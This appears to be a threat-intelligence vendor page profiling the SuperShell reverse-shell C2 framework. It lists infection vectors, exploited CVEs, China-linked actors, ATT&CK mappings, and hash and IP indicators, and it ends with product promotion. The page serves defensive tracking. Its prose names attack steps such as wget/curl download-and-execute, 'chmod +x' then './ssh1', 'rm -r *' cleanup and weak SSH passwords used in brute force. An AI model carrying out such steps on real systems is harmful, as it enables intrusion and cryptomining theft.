Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 3 actorsExploits 7 CVEs

SuperShell

SuperShell is an open-source command-and-control framework and backdoor, commonly described as a Go-based reverse shell that has been used to remotely control compromised systems and execute arbitrary commands. The content states it targets Linux SSH servers in particular, while supporting cross-platform operation on Linux, Windows, and Android. It is described as establishing a reverse SSH shell over web services, and exposed infrastructure has been identified via fingerprints such as HTML title "Supershell" and favicon hash -1010228102.

Observed infection vectors include brute-force and dictionary attacks against weak SSH credentials on Linux SSH servers, followed by download-and-execute chains using wget, curl, tftp, FTP, or shell scripts. Installation has been observed in directories such as /tmp, /var/run, /mnt, and /root, sometimes with cleanup commands to remove traces. SuperShell has also been deployed after exploitation of public-facing vulnerabilities, including CVE-2023-46747 on F5 BIG-IP devices, CVE-2024-1709 in ConnectWise ScreenConnect, CVE-2025-31324 in SAP NetWeaver, and CVE-2025-8110 in Gogs. In the Gogs exploitation campaign, attackers created repositories with random 8-character names and deployed a payload using the SuperShell framework; infected systems communicated with attacker-controlled infrastructure including 119.45.176[.]196, and payload servers included 106.53.108[.]81 and 119.91.42[.]53.

The malware has been repeatedly associated in the content with China-linked activity. AhnLab reported it was created by a Chinese-speaking developer. Mandiant assessed with moderate confidence that the combination of custom tooling and SUPERSHELL was unique to the PRC-linked actor UNC5174, which exploited F5 BIG-IP and ScreenConnect vulnerabilities and targeted U.S. and UK government, defense, research and education, NGOs, Hong Kong businesses, and institutions in Asia. Forescout-linked reporting associated infrastructure hosting Supershell backdoors with suspected Chinese actor Chaya_004. Cisco Talos reporting noted infrastructure overlap where hosts using a Bulbature certificate were also associated with SuperShell, GobRAT, and Cobalt Strike, all described as commonly associated with China-nexus actors. Additional reporting cited SuperShell use in campaigns targeting Windows and Linux servers in South Korea, and its appearance in broader exploitation waves such as React2Shell-related intrusions.

SuperShell has also been observed alongside additional payloads, especially XMRig Monero miners, indicating both persistence and cryptocurrency-mining objectives in some Linux SSH server compromises. Reported indicators include sample hashes such as ssh1.sh (157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff), setup c3pool miner.sh (23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa), ssh1 (cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15), and MD5s 4ee4f1e7456bb2b3d13e93797b9efbd3, 5ab6e938028e6e9766aa7574928eb062, and e06a1ba2f45ba46b892bef017113af09. Additional infrastructure and related indicators mentioned in the content include 47.97.42[.]177, 45.15.143.197, and attack-source IPs 209.141.60.249, 179.61.253.67, 107.189.8.15, and 2.58.84.90.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
EXPLOITED CVES

Vulnerabilities exploited

7 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

7 CVES
CVE-2025-31324Unauthenticated Arbitrary File Upload in SAP NetWeaver Visual Composer Metadata UploaderExploited in the wild

On April 24, 2025, SAP disclosed CVE-2025-31324, a critical vulnerability with a CVSS score of 10.0 affecting the SAP NetWeaver's Visual Composer Framework, version 7.50. This vulnerability allows unauthenticated users to upload arbitrary files to an SAP NetWeaver application server, leading to potential remote code execution (RCE) and full system compromise. | The IP address 47.97.42[.]177 has also been associated with malware based on the open-source tool SUPERSHELL.

via palo alto networks unit 42 blogunit42.paloaltonetworks.com
CVE-2025-8110Gogs PutContents API symlink path traversal leading to code executionExploited in the wild

A vulnerability in self-hosted Git service Gogs is facing widespread exploitation, and no patch is available at this time. That's according to Wiz, which on Dec. 10 published research disclosing CVE-2025-8110, a bypass for a remote code execution vulnerability disclosed for Gogs last year (CVE-2024-55947).

via dark readingdarkreading.com
CVE-2023-46747Authentication Bypass and RCE in F5 BIG-IP TMUIExploited in the wild

Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface... UNC5174 has been observed attempting to sell access... following CVE-2023-46747 exploitation.

via mandiant threat intelligencecloud.google.com
CVE-2023-22518Improper Authorization in Atlassian Confluence Data Center and Server

"This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174."

via mandiant threat intelligencecloud.google.com
CVE-2024-1709Authentication Bypass in ConnectWise ScreenConnectExploited in the wild

In February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor... to compromise hundreds of institutions primarily in the U.S. and Canada.

via mandiant threat intelligencecloud.google.com
CVE-2022-0185Linux kernel legacy_parse_param heap overflow local privilege escalation

"This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174."

via mandiant threat intelligencecloud.google.com
CVE-2022-30525Unauthenticated OS Command Injection in Zyxel USG FLEX, ATP, and VPN Series

"This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174."

via mandiant threat intelligencecloud.google.com
THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Chaya_004

Forescout Vedere Labs linked some of the ongoing attacks to a suspected Chinese threat actor they track as Chaya_004. The threat actor uses malicious infrastructure that includes "a network of servers hosting Supershell backdoors..."

via dark readingdarkreading.com
china_linked_threat_actors

Wiz researchers detected Supershell on an infected system, which is an open source command-and-control framework that has been used by China-linked threat actors.

via dark readingdarkreading.com
UNC5174

"This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174."

via mandiant threat intelligencecloud.google.com
MITRE ATT&CK

Techniques & procedures

20 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583.003Virtual Private ServerEvidence1

MITRE ATT&CK Mapping ... Resource Development Acquire Infrastructure: Virtual Private Server T1583.003 Alibaba Cloud VPS

T1587.001MalwareEvidence1

MITRE ATT&CK Mapping ... Resource Development Develop Capabilities: Malware T1587.001 SuperShell payload generation

Initial Access

2 techniques
T1078Valid AccountsEvidence1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1190Exploit Public-Facing ApplicationEvidence2

"In February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor."

Execution

2 techniques
T1059Command and Scripting InterpreterEvidence3

支持多种系统架构的反弹Shell客户端Payload...支持客户端断线自动重连

T1059.004Unix ShellEvidence1

Typically, the payload involves downloading a script or binary, which is then executed with elevated permissions using chmod +x followed by execution (./ssh1).

Persistence

2 techniques
T1078Valid AccountsEvidence1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1543.003Windows ServiceEvidence1

支持Windows安装反弹Shell服务

Privilege Escalation

3 techniques
T1068Exploitation for Privilege EscalationEvidence1

"Linux Kernel Exploit CVE-2022-0185"

T1078Valid AccountsEvidence1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1543.003Windows ServiceEvidence1

支持Windows安装反弹Shell服务

Stealth

3 techniques
T1070.004File DeletionEvidence1

...commands often including clean-up actions to remove traces post-installation (rm -r *).

T1078Valid AccountsEvidence1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1620Reflective Code LoadingEvidence2

支持内存注入,即文件不落地执行木马(内存马)

Credential Access

1 technique
T1110Brute ForceEvidence1

The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty."

Lateral Movement

1 technique
T1021.004SSHEvidence2

通过建立反向SSH隧道,获取完全交互式Shell

Command and Control

6 techniques
T1071Application Layer ProtocolEvidence3

Supershell是一个通过WEB服务访问的C2远控平台...通过在目标主机上建立反向SSH隧道,获取真正的完全交互式Shell

T1071.001Web ProtocolsEvidence1

MITRE ATT&CK Mapping ... Command and Control Application Layer Protocol: Web Protocols T1071.001 HTTP-based C2 panel

T1090ProxyEvidence2

We observed attackers deploying other reverse shell tools... GOREVERSE has the following capabilities: ... Dynamic, local and remote forwarding ... Multiple network transports... We observed an attacker execute ... a Base64-encoded PowerShell script... Uses ssh.exe to establish a remote tunnel to the C2 server.

T1090.003Multi-hop ProxyEvidence1

MITRE ATT&CK Mapping ... Command and Control Proxy: Multi-hop Proxy T1090.003 RSSH reverse tunnel over WebSocket

T1105Ingress Tool TransferEvidence2

支持文件管理、文件服务器...本地原生sftp命令传输文件

T1219Remote Access ToolsEvidence1

SuperShell ... operates as a reverse shell, enabling attackers to execute commands remotely on the compromised systems.

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

MITRE ATT&CK Mapping ... Exfiltration Exfiltration Over C2 Channel T1041 File download via RSSH tunnel

Impact

1 technique
T1496Resource HijackingEvidence1

Additionally, the attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell...

INDICATORS OF COMPROMISE

IOCs tracked for this family

1,512 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
18 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
3 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
1,491 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
uri●●●●●●●●●●●●View more in app1 day ago
uri●●●●●●●●●●●●View more in app2 days ago
uri●●●●●●●●●●●●View more in app8 days ago
uri●●●●●●●●●●●●View more in app9 days ago
uri●●●●●●●●●●●●View more in app15 days ago
ip.v4●●●●●●●●●●●●View more in app20 days ago
ACTIVITY FEED

Recent activity

32 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

32 SOURCESView more in app
breakglass intelNews
Apr 3, 2026
Block One ASN, Kill Sixteen Malware Families: Mapping OMEGATECH, a Three-Month-Old Bulletproof Hosting Network Running 67 C2 Servers on a Single Subnet - Breakglass Intelligence - Breakglass Intelligence

Command-and-control framework observed on the same subnet as multiple malware families.

Read more
cloudatg insightsNews
Feb 13, 2026
AI Development & Software Engineering | CloudATG

Golang-based malicious web shell/backdoor deployed after exploiting SAP NetWeaver RCE (CVE-2025-31324).

Read more
bleeping computerNews
Jan 8, 2026
New China-linked hackers breach telcos using edge device exploits

Backdoor malware associated with China-nexus infrastructure, referenced in context of shared C2 infrastructure.

Read more
talos intelligence blogNews
Jan 8, 2026
UAT-7290 targets high value telecommunications infrastructure in South Asia

Referenced as malware associated with China-nexus threat actors on IPs hosting the same certificate observed in Bulbature-related infrastructure.

Read more
+26 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching1,512

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities7

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping20

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.